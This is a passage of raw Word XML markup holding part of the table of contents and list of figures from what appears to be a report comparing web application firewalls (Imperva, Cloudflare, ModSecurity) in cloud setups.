            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138511" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.2 Performance</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_Toc71138511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56</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1374F7C1" w14:textId="214AA3CB" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138512" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.3 Alerts/Usability</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_Toc71138512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57</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09515FB0" w14:textId="3DBA5E51" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138513" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.4 Security</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_Toc71138513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58</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11D09BBC" w14:textId="57986EB6" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138514" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.5 Overall</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_Toc71138514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60</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF34900" w14:textId="535C5A79" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138515" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.6 Limitations</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_Toc71138515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60</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32444657" w14:textId="555E6B65" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138516" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6. Conclusion</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_Toc71138516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61</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="004B3A12" w14:textId="2D8F99AC" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138517" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7. References</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_Toc71138517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62</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60FF7C6F" w14:textId="249E2270" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138518" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>8. Appendix</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71138518 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00755101">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C32138B" w14:textId="44559B7F" w:rsidR="00DD2F93" w:rsidRDefault="00DD2F93">
          <w:r w:rsidRPr="00C71C5B">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="60F7642B" w14:textId="77777777" w:rsidR="00DD2F93" w:rsidRDefault="00DD2F93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74A07D" w14:textId="77777777" w:rsidR="00DA1D03" w:rsidRDefault="00DA1D03" w:rsidP="00CB0281">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc71138464"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>List of Figures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="39A949DC" w14:textId="0F5958F6" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00DA1D03">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005123A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc71138519" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1 - Cloud Service Model (Chou, 2018)</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_Toc71138519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16</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E83575D" w14:textId="041C8797" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138520" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2 - Magic Quadrant for Cloud Infrastructure and Platform Services (Gartner, 2020)</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_Toc71138520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17</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FBB4779" w14:textId="39DC8184" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138521" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3 - Summary of OSI layers (Imperva, 2020)</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_Toc71138521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19</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EB1F21B" w14:textId="44615967" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138522" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4 - Traffic through Imperva Cloud WAF (Imperva, 2020)</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_Toc71138522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22</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BA1C71C" w14:textId="1EC70B19" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138523" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5 - Traffic through Cloudflare (Cloudflare, 2021.)</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_Toc71138523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23</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="286033B9" w14:textId="34CCFCD8" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138524" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6 - Network topology without WAF</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_Toc71138524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26</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DACFCAD" w14:textId="7F276421" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138525" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7 - Network topology with ModSecurity WAF</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_Toc71138525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26</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="406642BA" w14:textId="1E04FD0E" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138526" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8 - Network topology with could WAF</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_Toc71138526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26</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E1AB728" w14:textId="275871A6" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138527" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9 - VPC within AWS</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_Toc71138527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27</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51F14E59" w14:textId="0C04F8DF" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138528" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10 - Imperva bot access control default settings</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_Toc71138528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30</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31579DDA" w14:textId="791EEAE0" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138529" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11 - Imperva WAF default settings</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_Toc71138529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31</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="094F6ECB" w14:textId="67FCF6AE" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71138530" w:history="1">
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12 - Cloudflare managed ruleset default settings</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_Toc71138530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33</w:t>
        </w:r>
        <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
          <w:rPr>
